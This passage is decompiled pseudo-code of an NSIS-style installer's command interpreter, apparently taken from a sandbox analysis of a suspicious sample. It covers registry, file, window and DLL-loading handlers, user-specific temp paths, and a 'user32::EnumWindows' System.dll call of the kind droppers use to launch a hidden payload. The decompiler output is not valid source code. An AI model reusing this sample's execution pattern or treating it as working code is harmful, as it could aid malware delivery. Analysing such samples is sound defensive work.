						if(__ebx == 0) {
							goto L391;
						}
						__eflags = __ebp;
						if(__ebp >= 0) {
							L102:
							__eflags = __ebp - __eax;
							__ebp =  >  ? __eax : __ebp;
							_v708 = _v708 + __ebp * 2;
							__eax = E00406B1A(__edi, _v708 + __ebp * 2);
							__eflags = __ebx;
							if(__ebx < 0) {
								0 = 0 + lstrlenW(__edi);
								__eflags = __ebx;
							}
							__eax = 0;
							__eflags = __ebx;
							__eax =  >=  ? __ebx : 0;
							__ebx = _v716;
							__eflags = __eax - 0x400;
							if(__eax < 0x400) {
								__ecx = 0;
								 *(__edi + __eax * 2) = __cx;
							}
							goto L392;
						}
						__ebp = __eax + __ebp;
						__eflags = __ebp;
						if(__ebp < 0) {
							goto L391;
						}
						goto L102;
					case 0x18:
						__esi = E0040303E(__edx, 0x20);
						_push(E0040303E(__edx, 0x31));
						_push(__esi);
						__eflags = _v684;
						if(_v684 != 0) {
							__eax = lstrcmpW();
						} else {
							__eax = lstrcmpiW();
						}
						__eflags = __eax;
						if(__eax != 0) {
							goto L122;
						} else {
							goto L110;
						}
					case 0x19:
						__esi = 0;
						__esi = 1;
						0 = E0040303E(__edx, 1);
						__eax = ExpandEnvironmentStringsW(__ebx, __edi, 0x400);
						__eflags = __eax;
						if(__eax == 0) {
							L114:
							__eax = 0;
							__ebx = __esi;
							 *__edi = __ax;
							L116:
							__eax = 0;
							 *(__edi + 0x7fe) = __ax;
							goto L392;
						}
						__eflags = _v684;
						if(_v684 == 0) {
							L115:
							__ebx = _v716;
							goto L116;
						}
						__eax = lstrcmpW(__ebx, __edi);
						__eflags = __eax;
						if(__eax != 0) {
							goto L115;
						}
						goto L114;
					case 0x1a:
						__esi = _v672;
						__edi = E00403002(0);
						__eax = E00403002("true");
						__eflags = _v672;
						if(_v672 != 0) {
							__eflags = __edi - __eax;
							if(__eflags >= 0) {
								if(__eflags <= 0) {
									goto L110;
								}
								L124:
								__eax = _v680.dwHighDateTime;
								return _v680.dwHighDateTime;
							}
							L122:
							__eax = _v680.dwLowDateTime;
							return _v680.dwLowDateTime;
						}
						__eflags = __edi - __eax;
						if(__eflags < 0) {
							goto L122;
						}
						if(__eflags <= 0) {
							goto L110;
						}
						goto L124;
					case 0x1b:
						__ebx = 0;
						__ebx = 1;
						__esi = E00403002(1);
						0 = E00403002(2);
						__eax = _v680.dwLowDateTime;
						__eflags = __eax - 0xd;
						if(__eax > 0xd) {
							L149:
							__ebx = _v716;
							L150:
							__eax = E0040661F(__edi, __esi);
							goto L392;
						}
						switch( *((intOrPtr*)(__eax * 4 +  &M00402FCA))) {
							case 0:
								__esi = __esi + __ecx;
								goto L149;
							case 1:
								__esi = __esi - __ecx;
								goto L149;
							case 2:
								__esi = __esi * __ecx;
								goto L149;
							case 3:
								__eflags = __ecx;
								if(__ecx == 0) {
									goto L132;
								}
								__eax = __esi;
								asm("cdq");
								_t103 = __eax % __ecx;
								__eax = __eax / __ecx;
								__edx = _t103;
								__esi = __eax;
								goto L133;
							case 4:
								__esi = __esi | __ecx;
								goto L149;
							case 5:
								__esi = __esi & __ecx;
								goto L149;
							case 6:
								__esi = __esi ^ __ecx;
								goto L149;
							case 7:
								__eax = 0;
								__eflags = __esi;
								__eax = 0 | __eflags == 0x00000000;
								__esi = __eflags == 0;
								goto L149;
							case 8:
								__eflags = __esi;
								if(__esi == 0) {
									goto L142;
								}
								goto L139;
							case 9:
								__eflags = __esi;
								if(__esi == 0) {
									L140:
									__esi = __ebp;
									goto L149;
								}
								L142:
								__eflags = __ecx;
								if(__ecx == 0) {
									goto L140;
								}
								L139:
								__esi = __ebx;
								goto L149;
							case 0xa:
								__eflags = __ecx;
								if(__ecx == 0) {
									L132:
									__esi = __ebp;
									L133:
									__ebx = 0;
									__eflags = __ecx;
									__ebx = 0 | __ecx == 0x00000000;
									goto L150;
								}
								__eax = __esi;
								asm("cdq");
								_t111 = __eax % __ecx;
								__eax = __eax / __ecx;
								__edx = _t111;
								__esi = _t111;
								goto L133;
							case 0xb:
								__esi = __esi << __cl;
								goto L149;
							case 0xc:
								__esi = __esi >> __cl;
								goto L149;
							case 0xd:
								__eflags = __esi;
								goto L149;
						}
					case 0x1c:
						__esi = E0040303E(__edx, "true");
						E00403002(2) = wsprintfW(__edi, __esi, __eax);
						__esp = __esp + 0x10;
						goto L391;
					case 0x1d:
						__ecx = _v684;
						__esi =  *0x40b100; // 0x0
						__eflags = __ecx;
						if(__ecx == 0) {
							__eflags = __eax;
							if(__eax == 0) {
								__eax = GlobalAlloc(0x40, 0x804);
								_push(_v692);
								__esi = __eax;
								_t118 = __esi + 4; // 0x4
								__eax = _t118;
								_push(_t118);
								__eax = E00405EBA();
								__eax =  *0x40b100; // 0x0
								 *__esi = __eax;
								 *0x40b100 = __esi;
								goto L391;
							}
							__eflags = __esi;
							if(__esi == 0) {
								goto L28;
							}
							_t116 = __esi + 4; // 0x4
							_t116 = E00406B1A(__edi, _t116);
							__eax =  *__esi;
							 *0x40b100 =  *__esi;
							__eax = GlobalFree(__esi);
							goto L391;
						} else {
							goto L153;
						}
						while(1) {
							L153:
							__ecx = __ecx - 1;
							__eflags = __esi;
							if(__esi == 0) {
								goto L158;
							}
							__esi =  *__esi;
							__eflags = __ecx;
							if(__ecx != 0) {
								continue;
							}
							__eflags = __esi;
							if(__esi == 0) {
								goto L158;
							}
							__esi = __esi + 4;
							__edi = L"Call";
							__eax = E00406B1A(__edi, __esi);
							__eax =  *0x40b100; // 0x0
							__eax = E00406B1A(__esi, __eax);
							__eax =  *0x40b100; // 0x0
							_push(__edi);
							__eax =  &(__eax[2]);
							__eflags = __eax;
							_push(__eax);
							goto L157;
						}
						goto L158;
					case 0x1e:
						__esi = E00403002(3);
						_v712 = __esi;
						0 = E00403002(4);
						__eax = _v672;
						__eflags = __al & 0x00000001;
						if((__al & 0x00000001) != 0) {
							__esi = E0040303E(__edx, 0x33);
							__eax = _v680.dwHighDateTime;
							_v716 = __esi;
						}
						__eflags = __al & 0x00000002;
						if((__al & 0x00000002) != 0) {
							0 = E0040303E(__edx, 0x44);
						}
						__eflags = _v696 - 0x21;
						_push("true");
						if(_v696 != 0x21) {
							__esi = E0040303E(__edx);
							__eax = E0040303E(__edx);
							__ecx = 0;
							__eflags =  *__eax - __bp;
							 !=  ? __eax : 0 = 0;
							__eflags =  *__esi - __bp;
							__ecx =  !=  ? __esi : 0;
							__eax = FindWindowExW(_v720, __ebx,  !=  ? __esi : 0,  !=  ? __eax : 0);
							goto L172;
						} else {
							_v712 = E00403002();
							__eax = E00403002(2);
							__ecx = _v672;
							__ecx = _v672 >> 2;
							__eflags = __ecx;
							if(__ecx == 0) {
								__eax = SendMessageW(_v712, __eax, __esi, __ebx);
								L172:
								_v704 = __eax;
								L173:
								__eflags = _v692 - __ebp;
								if(_v692 < __ebp) {
									goto L391;
								}
								goto L98;
							}
							__edx =  &_v704;
							__eax =  ~__eax;
							asm("sbb ebx, ebx");
							__eax = _v704;
							_v716 = 0;
							goto L173;
						}
					case 0x1f:
						__eax = E00403002(0);
						__eax = IsWindow(__eax);
						L176:
						__eflags = __eax;
						if(__eax == 0) {
							L110:
							__eax = _v684;
							return _v684;
						}
						__eax = _v688;
						return _v688;
					case 0x20:
						__esi = E00403002(2);
						__eax = E00403002("true");
						__eax = GetDlgItem(__eax, __esi);
						goto L98;
					case 0x21:
						__esi =  *0x435a48;
						__esi =  *0x435a48 + __eax;
						E00403002(0) = SetWindowLongW(__eax, 0xffffffeb, __esi);
						goto L391;
					case 0x22:
						__eflags = _v680.dwLowDateTime & 0x00000100;
						if((_v680.dwLowDateTime & 0x00000100) == 0) {
							__eax = GetDlgItem(__edx, _v684);
						} else {
							__eax = E00403002(2);
						}
						__ebp = __eax;
						__eax = _v680.dwLowDateTime;
						__ecx = __eax;
						__ebx = __eax;
						__ecx = __eax & 0x00000004;
						__ebx = __eax >> 0x1e;
						_v704 = __eax & 0x00000004;
						__esi = __eax;
						__ecx = __eax;
						__esi = __eax & 0x00000003;
						__ecx = __eax >> 0x1f;
						__ebx = __eax >> 0x0000001e & 0x00000001;
						_v708 = __eax >> 0x1f;
						__eflags = __eax & 0x00010000;
						if((__eax & 0x00010000) == 0) {
							__eax = _v688 & 0x0000ffff;
						} else {
							__eax = E0040303E(__edx, 0x11);
						}
						_v712 = __eax;
						 &_v652 = GetClientRect(__ebp,  &_v652);
						_v680.dwLowDateTime = _v680.dwLowDateTime & 0x0000fef0;
						_v640 = _v640 * 0;
						_v644 = _v644 * _v708;
						__eax = 0;
						__eflags = _v704;
						__eax =  !=  ?  *0x4349f4 : 0;
						0 = LoadImageW( !=  ?  *0x4349f4 : 0, _v712, __esi, _v644 * _v708, _v640 * 0, _v680.dwLowDateTime & 0x0000fef0);
						__eax = SendMessageW(__ebp, 0x172, __esi, __ebx);
						__eflags = __eax;
						if(__eax != 0) {
							__eflags = __esi;
							if(__esi == 0) {
								__eax = DeleteObject(__eax);
							}
						}
						__eflags = _v692;
						if(_v692 < 0) {
							goto L391;
						} else {
							_push(__ebx);
							goto L20;
						}
					case 0x23:
						__edi = GetDC(__edx);
						__esi = E00403002(2);
						__eax = GetDeviceCaps(__edi, 0x5a);
						__eax = MulDiv(__esi, __eax, 0x48);
						0x40d908->lfHeight = __eax;
						_v708 = ReleaseDC(_v708, __edi);
						__eax = E00403002(3);
						__ecx = _v684;
						_push(_v696);
						 *0x40d918 = __eax;
						__cl = __cl & 0x00000001;
						 *0x40d91f = 1;
						 *0x40d91c = __cl & 0x00000001;
						__al = __cl;
						__al = __cl & 0x00000002;
						__cl = __cl & 0x00000004;
						_push("Calibri");
						 *0x40d91d = __al;
						 *0x40d91e = __cl;
						__eax = E00405EBA();
						__eax = CreateFontIndirectW(0x40d908);
						__ebp = _v724;
						_push(__eax);
						_push(_v724);
						goto L21;
					case 0x24:
						__esi = E00403002(0);
						_push(E00403002("true"));
						_push(__esi);
						__eflags = _v680.dwLowDateTime;
						if(_v680.dwLowDateTime != 0) {
							__eax = EnableWindow();
						} else {
							__eax = ShowWindow();
						}
						goto L391;
					case 0x25:
						0 = E0040303E(__edx, 0);
						__esi = E0040303E(__edx, 0x31);
						__edi = E0040303E(__edx, 0x22);
						E0040303E(__edx, 0x15) = E00405D3A(0xffffffec, "C:\Users\Arthur\AppData\Local\Temp\nsh6AA5.tmp\System.dll");
						__ecx = _v700;
						__eax = _v724;
						_v668 = _v724;
						__eax = 0;
						_v672 = _v700;
						__ecx = _v704;
						_v648 = __ecx;
						__eflags =  *__ebx - __bp;
						_v660 = __esi;
						__eax =  !=  ? __ebx : 0;
						_v664 =  !=  ? __ebx : 0;
						__eax = 0;
						__eflags =  *__edi - __bp;
						_v652 = L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\mnstring\\Cirkusprogrammet\\Lovgivningers\\Wolfgang";
						__eax =  !=  ? __edi : 0;
						_v656 =  !=  ? __edi : 0;
						__eax =  &(_v680.dwHighDateTime);
						__eax = E004069F3( &(_v680.dwHighDateTime));
						__eflags = __eax;
						if(__eax == 0) {
							goto L28;
						}
						__eflags = _v648 & 0x00000040;
						if((_v648 & 0x00000040) == 0) {
							goto L391;
						}
						__eax = E00406514(__ecx, _v596.dwFileAttributes);
						__eax = CloseHandle( *(__esp + 0x88));
						goto L198;
					case 0x26:
						__esi = E0040303E(__edx, 0);
						__eax = E00405D3A(0xffffffeb, __eax);
						__eax = E004066D6(__esi); // executed
						__ebx = _v732;
						__esi = __eax;
						__eflags = __esi;
						if(__esi == 0) {
							goto L28;
						}
						__eflags = _v684;
						if(_v684 != 0) {
							__eax = E00406514(__ecx, __esi);
							__eflags = _v692;
							if(_v692 < 0) {
								0 = 1;
								__eflags = __eax;
								_v716 = 0;
							} else {
								__eax = E0040661F(_v712, __eax);
							}
						}
						__eax = CloseHandle(__esi);
						goto L198;
					case 0x27:
						__eax = E0040303E(__edx, 2);
						0 = __eax;
						__eflags = __ebx;
						if(__ebx == 0) {
							__eax = 0;
							 *__edi = __ax;
							 *__esi = __ax;
							goto L28;
						}
						__eax = E0040661F(__esi, __ebx[0xa]);
						_push(__ebx[0xc]);
						goto L20;
					case 0x28:
						__eax = E0040303E(__edx, 0xffffffee);
						__ecx =  &_v656;
						_v660 = __eax;
						_push( &_v656);
						_push(__eax);
						__eax = E004068E6(0xa);
						__eax =  *__eax();
						__ecx = 0;
						_v724 = __eax;
						__ebx = 0;
						 *__edi = __cx;
						__ebx = 1;
						 *__esi = __cx;
						__eflags = __eax;
						if(__eax != 0) {
							__eax = GlobalAlloc(0x40, __eax);
							_v712 = __eax;
							__eflags = __eax;
							if(__eax != 0) {
								__esi = E004068E6(0xb);
								__eax = E004068E6(0xc);
								_push(_v720);
								_v716 = __eax;
								_push(_v724);
								_push(0);
								_push(_v672);
								__eax =  *__esi();
								__eflags = __eax;
								if(__eax != 0) {
									__eax =  &_v688;
									_push( &_v688);
									__eax =  &_v692;
									_push( &_v692);
									_push(0x4092b0);
									_push(_v728);
									__eax = _v724();
									__eflags = __eax;
									if(__eax != 0) {
										__ecx = _v708;
										_v720 = E0040661F(__edi,  *((intOrPtr*)(_v708 + 8 + _v720 * 4)));
										__ecx = _v728;
										_v716 = E0040661F(_v760,  *((intOrPtr*)(_v716 + 0xc + _v728 * 4)));
										__ebx = 0;
									}
								}
								__eax = GlobalFree(_v728);
							}
						}
						goto L392;
					case 0x29:
						__esi = 0;
						__esi = 1;
						__ebx = 1;
						__eflags =  *0x435a60;
						if( *0x435a60 < 0) {
							_push("C:\Users\Arthur\AppData\Local\Temp\nsh6AA5.tmp\System.dll");
							_push(0xffffffe7);
							goto L230;
						}
						__edi = E0040303E(__edx, 0xfffffff0);
						_v712 = __edi;
						_v720 = E0040303E(__edx, 1);
						__eflags = _v684;
						if(_v684 == 0) {
							L218:
							__eax = LoadLibraryExW(__edi, __ebp, 8); // executed
							__edi = __eax;
							__eflags = __edi;
							if(__eflags == 0) {
								_push("C:\Users\Arthur\AppData\Local\Temp\nsh6AA5.tmp\System.dll");
								_push(0xfffffff6);
								goto L230;
							}
							L219:
							0 = E00406269(__eflags, __edi, _v712);
							_v716 = __ecx;
							__eflags = __ecx;
							if(__ecx == 0) {
								__eax = E00405D3A(0xfffffff7, _v712);
							} else {
								__ebx = __ebp;
								__eflags = _v684 - __ebp;
								if(_v684 == __ebp) {
									__eax = _v700;
									_push(0x40b000);
									_push(0x40b100);
									_push(L"user32::EnumWindows(i r1 ,i 0)");
									_push(0x400);
									_push(_v700);
									__eax =  *__ecx();
									__esp = __esp + 0x14;
								} else {
									__eax = E00405D3A(_v684, "C:\Users\Arthur\AppData\Local\Temp\nsh6AA5.tmp\System.dll");
									__eax = _v716();
									__eflags = __eax;
									if(__eax != 0) {
										__ebx = __esi;
									}
								}
							}
							__eflags = _v680.dwLowDateTime - __ebp;
							if(_v680.dwLowDateTime == __ebp) {
								__eax = E00403CD6(__edi);
								__eflags = __eax;
								if(__eax != 0) {
									__eax = FreeLibrary(__edi);
								}
							}
							goto L392;
						}
						__eax = GetModuleHandleW(__edi); // executed
						__edi = __eax;
						__eflags = __edi;
						if(__eflags != 0) {
							goto L219;
						}
						__edi = _v708;
						goto L218;
					case 0x2a:
						_v656 = E0040303E(__edx, 0xfffffff0);
						__eax = E0040303E(__edx, 0xffffffdf);
						__ebx = __eax;
						_v716 = __eax;
						_v672 = E0040303E(__edx, 2);
						_v672 = E0040303E(__edx, 0xffffffcd);
						_v684 = E0040303E(__edx, 0x45);
						__eax = _v696;
						__eax = __eax & 0x00000fff;
						__edi = __eax;
						_v720 = __eax & 0x00000fff;
						__ecx = __eax;
						__ecx = __eax & 0x00008000;
						__eax = __eax >> 0x10;
						__edi = __edi >> 0xc;
						_v724 = __ecx;
						__edi = __edi & 0x00000007;
						_v688 = __eax;
						__eax = E00406E03(__ebx);
						__eflags = __eax;
						if(__eax == 0) {
							__eax = E0040303E(__edx, 0x21);
						}
						__eax =  &_v716;
						__esi = 0;
						_push(__eax);
						_push(0x409abc);
						__esi = 1;
						_push(1);
						_push(__ebp);
						_push(0x409adc);
						__imp__CoCreateInstance();
						__ebx = __eax;
						__eflags = __ebx;
						if(__ebx >= 0) {
							__eax = _v736;
							__edx =  &_v732;
							_push( &_v732);
							_push(0x409acc);
							_push(__eax);
							__ecx =  *__eax;
							0 = __eax;
							__eflags = __ebx;
							if(__ebx >= 0) {
								__eax =  *(__esp + 0x10);
								_push(_v740);
								_push(__eax);
								__ecx =  *__eax;
								0 = __eax;
								__eflags = _v744 - __ebp;
								if(_v744 == __ebp) {
									__eax = _v756;
									_push(L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\mnstring\\Cirkusprogrammet\\Lovgivningers\\Wolfgang");
									_push(__eax);
									__ecx =  *__eax;
									__eax =  *((intOrPtr*)( *__eax + 0x24))();
								}
								__eflags = __edi;
								if(__edi != 0) {
									__eax = _v756;
									_push(__edi);
									_push(__eax);
									__ecx =  *__eax;
									__eax =  *((intOrPtr*)( *__eax + 0x3c))();
								}
								__eax = _v756;
								_push(_v708);
								_push(__eax);
								__ecx =  *__eax;
								__eax =  *((intOrPtr*)( *__eax + 0x34))();
								__edx = _v704;
								__eflags = __edx->i - __bp;
								if(__edx->i != __bp) {
									__eax = _v764;
									_push( *((intOrPtr*)(__esp + 0x20)));
									_push(__edx);
									__ecx =  *__eax;
									_push(__eax);
									__eax =  *((intOrPtr*)( *__eax + 0x44))();
								}
								__eax = _v764;
								_push(_v708);
								_push(__eax);
								__ecx =  *__eax;
								__eax =  *((intOrPtr*)( *__eax + 0x2c))();
								__eax =  *(__esp + 0x10);
								_push(_v720);
								_push(__eax);
								__ecx =  *__eax;
								__eax =  *((intOrPtr*)( *__eax + 0x1c))();
								__eflags = __ebx;
								if(__ebx >= 0) {
									__eax = _v776;
									_push(__esi);
									_push(_v716);
									__ecx =  *__eax;
									_push(__eax);
									0 = __eax;
								}
								__eax = _v776;
								_push(__eax);
								__ecx =  *__eax;
								__eax =  *((intOrPtr*)( *__eax + 8))();
							}
							__eax =  *(__esp + 0x10);
							_push(__eax);
							__ecx =  *__eax;
							__eax =  *((intOrPtr*)( *__eax + 8))();
						}
						__ebx = 0 >> 0x1f;
						0xbadbac = 0xbadba0;
						__eax = E00405D3A(0xbadba0, "C:\Users\Arthur\AppData\Local\Temp\nsh6AA5.tmp\System.dll");
						__ebx = __ebx >> 0x1f;
						goto L392;
					case 0x2b:
						__esi = E0040303E(__edx, 0);
						__edi = E0040303E(__edx, 0x11);
						0 = E0040303E(__edx, 0x23);
						__eax = E004065CF(__esi);
						__eflags = __eax;
						if(__eax != 0) {
							__eax = _v700;
							_v652 = _v700;
							_v648 = 2;
							__eax = lstrlenW(__esi);
							__ecx = 0;
							 *(__esi + 2 + __eax * 2) = __cx;
							__eax = lstrlenW(__edi);
							__ecx = 0;
							 *(__edi + 2 + __eax * 2) = __cx;
							__ax = _v684;
							_v644 = __esi;
							_v640 = __edi;
							 *(__esp + 0x72) = __ebx;
							 *((short*)(__esp + 0x68)) = _v684;
							E00405D3A(0, __ebx) =  &_v660;
							__eax = SHFileOperationW( &_v660);
							__eflags = __eax;
							if(__eax == 0) {
								goto L391;
							}
						}
						__eax = E00405D3A(0xfffffff9, __ebp);
						goto L28;
					case 0x2c:
						__eflags = __ecx - 0xbadf00d;
						if(__ecx != 0xbadf00d) {
							L158:
							_push(0x200010);
							_push(0xffffffe8);
							_push(__ebp);
							_push(E00405EBA());
							L89:
							__eax = E00406AA8();
							L5:
							__eax = 0x7fffffff;
							return 0x7fffffff;
						}
						 *0x435ad4 =  *0x435ad4 + 1;
						goto L391;
					case 0x2d:
						__esi = 0;
						__edi = 0;
						__eflags = __ecx;
						if(__ecx != 0) {
							__ebp = E0040303E(__edx, 0);
							__eax = _v692;
						}
						__eflags = __eax;
						if(__eax != 0) {
							__esi = E0040303E(__edx, 0x11);
						}
						__eflags = _v680.dwHighDateTime - __edi;
						if(_v680.dwHighDateTime != __edi) {
							__edi = E0040303E(__edx, 0x22);
						}
						__eax = E0040303E(__edx, 0xffffffcd);
						__eax = WritePrivateProfileStringW(__ebp, __esi, __edi, __eax); // executed
						L27:
						__eflags = __eax;
						if(__eax != 0) {
							goto L391;
						}
						goto L28;
					case 0x2e:
						__ebx = 0;
						_v652 = 0xa;
						__ebx = 1;
						__edi = E0040303E(__edx, 1);
						__esi = E0040303E(__edx, 0x12);
						__eax = E0040303E(__edx, 0xffffffdd);
						__ebp = _v716;
						 &_v664 = GetPrivateProfileStringW(__edi, __esi,  &_v664, __ebp, 0x3ff,  &_v664);
						_push(0xa);
						_pop(__eax);
						__eflags =  *__ebp - __ax;
						if( *__ebp != __ax) {
							goto L391;
						}
						__eax = 0;
						 *__ebp = __ax;
						goto L392;
					case 0x2f:
						__edi = 0;
						__edi = 1;
						__eflags = _v680.dwHighDateTime;
						if(__eflags != 0) {
							__eax = E0040303E(__edx, 0x22);
							_v680.dwLowDateTime = _v680.dwLowDateTime >> 1;
							__ecx = _v672;
							__edi = __eax;
						} else {
							__eax = E004030C1(__ecx, __edx, __eflags, 2); // executed
							__esi = __eax;
							__eflags = __esi;
							if(__esi != 0) {
								__eax = E0040303E(__edx, 0x33);
								__edi = __eax;
								__eax = RegCloseKey(__esi);
							}
						}
						__ebx = 0;
						__eflags = __edi;
						__ebx = 0 | __edi != 0x00000000;
						goto L392;
					case 0x30:
						__eax = _v680.dwHighDateTime;
						_v708 = _v680.dwHighDateTime;
						__eax = _v672;
						_v712 = _v672;
						_v708 = E0040303E(__edx, 2);
						__eax = E0040303E(__edx, 0x11);
						__ecx =  &_v672;
						0 = 1;
						__ebx = 1;
						__eax = E00403023(_v660);
						__eax = E004062A5(__eflags, __eax, __eax, 0x100022,  &_v672); // executed
						__edi = _v692;
						__ecx = 0;
						__eflags = __eax;
						__edi =  !=  ? 0 : _v692;
						_v680.dwLowDateTime = __edi;
						__eflags = __edi;
						if(__edi == 0) {
							goto L392;
						}
						__eax = _v708;
						__edi = 0x40c108;
						__eflags = __eax - 1;
						if(__eax != 1) {
							_push(4);
							_pop(__esi);
							__eflags = __eax - 1;
							if(__eax != 1) {
								__esi = 0;
								__eflags = __eax - 3;
								if(__eax == 3) {
									0 = E00403148(_v680.dwLowDateTime, 0, 0x40c108, 0x1800);
								}
							} else {
								 *0x40c108 = E00403002(3);
							}
						} else {
							__eax = E0040303E(__edx, 0x23);
							0 = 2 + lstrlenW(0x40c108) * 2;
						}
						__esi = _v652;
						__eax = RegSetValueExW(__esi, _v704, __ebp, _v712, __edi, __esi); // executed
						__eax =  ~__eax;
						asm("sbb eax, eax");
						__eflags = 0;
						goto L274;
					case 0x31:
						__eax = E004030C1(__ecx, __edx, __eflags, 0x20019); // executed
						__esi = __eax;
						__eax = E0040303E(__edx, 0x33);
						__ecx = 0;
						 *__edi = __cx;
						__eflags = __esi;
						if(__esi == 0) {
							goto L28;
						}
						__ecx =  &_v652;
						_v652 = 0x800;
						__ecx =  &_v704;
						__eax = RegQueryValueExW(__esi, __eax, 0,  &_v704, __edi,  &_v652); // executed
						__ecx = 0;
						__ecx = 1;
						__eflags = __eax;
						if(__eax != 0) {
							L282:
							__eax = 0;
							__ebx = __ecx;
							 *__edi = __ax;
							L274:
							__eax = RegCloseKey(__esi); // executed
							goto L392;
						}
						__eflags = _v704 - 4;
						if(_v704 == 4) {
							__ebx = 0;
							__eflags = _v680.dwHighDateTime;
							__ebx = 0 | _v680.dwHighDateTime == 0x00000000;
							__eax = E0040661F(__edi,  *__edi);
							goto L274;
						}
						__eflags = _v704 - 1;
						if(_v704 == 1) {
							L280:
							__ebx = _v680.dwHighDateTime;
							__eax = 0;
							 *(__edi + 0x7fe) = __ax;
							goto L274;
						}
						__eflags = _v704 - 2;
						if(_v704 != 2) {
							goto L282;
						}
						goto L280;
					case 0x32:
						__eax = E004030C1(__ecx, __edx, __eflags, 0x20019); // executed
						__esi = __eax;
						__eax = E00403002(3);
						__ebx = _v720;
						__ecx = 0;
						 *__edi = __cx;
						__eflags = __esi;
						if(__esi == 0) {
							goto L28;
						}
						__ecx = 0x3ff;
						_v652 = 0x3ff;
						__eflags = _v680.dwHighDateTime;
						if(_v680.dwHighDateTime == 0) {
							__ecx =  &_v652;
							__eax = RegEnumValueW(__esi, __eax, __edi,  &_v652, 0, 0, 0, 0);
							0 = 1;
							__eflags = __eax;
							_v716 = 0;
						} else {
							__eax = RegEnumKeyW(__esi, __eax, __edi, 0x3ff);
						}
						__eax = 0;
						 *(__edi + 0x7fe) = __ax;
						__eax = RegCloseKey(__esi);
						goto L391;
					case 0x33:
						__eax = E00406C25(__edi);
						__eflags = __eax;
						if(__eax == 0) {
							goto L391;
						}
						__eax = CloseHandle(__eax);
						L198:
						goto L391;
					case 0x34:
						__eax = E0040303E(__edx, 0xffffffed);
						__eax = E0040691B(__eax, _v692, _v688);
						__eflags = __eax - 0xffffffff;
						if(__eax != 0xffffffff) {
							L98:
							_push(__eax);
							L20:
							_push(__edi);
							goto L21;
						}
						goto L291;
					case 0x35:
						__ecx = _v696;
						__eax = 0;
						__edx = _v684;
						__eflags = __ecx - 0x38;
						_v652 = __edx;
						__esi = 0x40b908;
						__eax = 0 | __eflags == 0x00000000;
						0 = 1;
						_v712 = __eflags == 0;
						__eflags = __edx;
						if(__edx == 0) {
							__eflags = __ecx - 0x38;
							if(__ecx != 0x38) {
								__eax = E0040303E(__edx, 0x11);
								__eax = lstrlenW(__eax);
								__eflags = __eax + __eax;
							} else {
								E0040303E(__edx, 0x21) = E00406469("C:\Users\Arthur\AppData\Local\Temp\nsh6AA5.tmp", 0x40b908, 0x400);
								__esi = lstrlenA(0x40b908);
							}
						} else {
							__eax = E00403002(1);
							_v712 = _v712 ^ 1;
							 *0x40b908 = __ax;
							__esi = (_v712 ^ 1) + 1;
						}
						__eflags =  *__edi - __bp;
						if( *__edi == __bp) {
							goto L392;
						} else {
							__edi = E00406C25(__edi);
							_v716 = _v716 | _v656;
							__eflags = _v716 | _v656;
							if((_v716 | _v656) != 0) {
								L301:
								__eax = E00406A0B(__ecx, __edi, "C:\Users\Arthur\AppData\Local\Temp\nsh6AA5.tmp\System.dll", __esi);
								__eflags = __eax;
								if(__eax != 0) {
									goto L391;
								}
								goto L392;
							}
							__eflags = _v680.dwLowDateTime - __ebp;
							if(_v680.dwLowDateTime == __ebp) {
								goto L301;
							}
							__eax = E00406484(__edi, __edi);
							__eflags = __eax;
							if(__eax < 0) {
								goto L392;
							}
							goto L301;
						}
					case 0x36:
						_push(2);
						_pop(__ecx);
						_v712 = 0;
						_v700 = __ecx;
						__eax = E00403002(__ecx);
						__ebx = 0;
						__ebx = 1;
						__eflags = __eax - 1;
						if(__eax < 1) {
							goto L391;
						}
						__ecx = 0x3ff;
						__eflags = __eax - 0x3ff;
						_v708 = __eax;
						__eflags =  *__edi - __bp;
						if( *__edi == __bp) {
							L327:
							__eax = _v712;
							__ecx = 0;
							__ebx = 0;
							__eflags = __eax;
							 *(__esi + __eax * 2) = __cx;
							L80:
							__ebx = __ebx & 0xffffff00 | __eflags == 0x00000000;
							goto L392;
						}
						_v668 = 0;
						0 = E00406C25(__edi);
						_v708 = __ecx;
						__eflags = _v712;
						if(_v712 <= 0) {
							goto L327;
						}
						_v664 = 0xd;
						__edi = 0;
						do {
							__eflags = _v696 - 0x39;
							if(_v696 != 0x39) {
								__eflags = _v680.dwLowDateTime - __ebp;
								if(_v680.dwLowDateTime != __ebp) {
									L320:
									__eax =  &_v660;
									__eax = E00406948(__ecx, __ecx,  &_v660, 2);
									__eflags = __eax;
									if(__eax == 0) {
										goto L327;
									}
									L321:
									__ecx = _v700;
									__eax = _v660;
									L322:
									__eflags = _v680.dwLowDateTime - __ebp;
									if(_v680.dwLowDateTime != __ebp) {
										L333:
										__ax & 0x0000ffff = E0040661F(__esi, __ax & 0x0000ffff);
										goto L393;
									}
									_push(0xd);
									_pop(__edx);
									__eflags = _v668 - __dx;
									_push(0xa);
									_pop(__edx);
									if(_v668 == __dx) {
										L328:
										__eflags = _v668 - __ax;
										if(_v668 == __ax) {
											L332:
											__eax = SetFilePointer(_v704, 0, __ebp, 0);
											goto L327;
										}
										__eflags = __ax - _v664;
										if(__ax == _v664) {
											L331:
											 *(__esi + __edi * 2) = __ax;
											_v712 = __edi;
											goto L327;
										}
										__eflags = __ax - __dx;
										if(__ax != __dx) {
											goto L332;
										}
										goto L331;
									}
									__eflags = _v668 - __dx;
									if(_v668 == __dx) {
										goto L328;
									}
									 *(__esi + __edi * 2) = __ax;
									__edi = __edi + 1;
									__eax = __ax & 0x0000ffff;
									_v712 = __edi;
									_v668 = __ax & 0x0000ffff;
									__eflags = __ax;
									if(__ax == 0) {
										goto L327;
									}
									goto L326;
								}
								__eflags = __edi;
								if(__edi != 0) {
									goto L320;
								}
								__eax = E00406484(__ecx, __ebp);
								__eflags = __eax;
								if(__eax < 0) {
									goto L327;
								}
								__ecx = _v704;
								goto L320;
							}
							_push(__ebp);
							__eax =  &_v656;
							_push( &_v656);
							_push(2);
							_pop(__eax);
							 &_v656 - _v680.dwLowDateTime =  &_v716;
							__eax = ReadFile(__ecx,  &_v716,  &_v656 - _v680.dwLowDateTime, ??, ??);
							__eflags = __eax;
							if(__eax == 0) {
								goto L327;
							}
							__ecx = _v656;
							_v700 = __ecx;
							__eflags = __ecx;
							if(__ecx == 0) {
								goto L327;
							}
							__eax = _v716 & 0x000000ff;
							_v660 = _v716 & 0x000000ff;
							__eflags = _v680.dwLowDateTime - __ebp;
							if(_v680.dwLowDateTime != __ebp) {
								goto L333;
							}
							 &_v660 =  &_v716;
							__eax = MultiByteToWideChar(__ebp, 8,  &_v716, __ecx,  &_v660, __ebx);
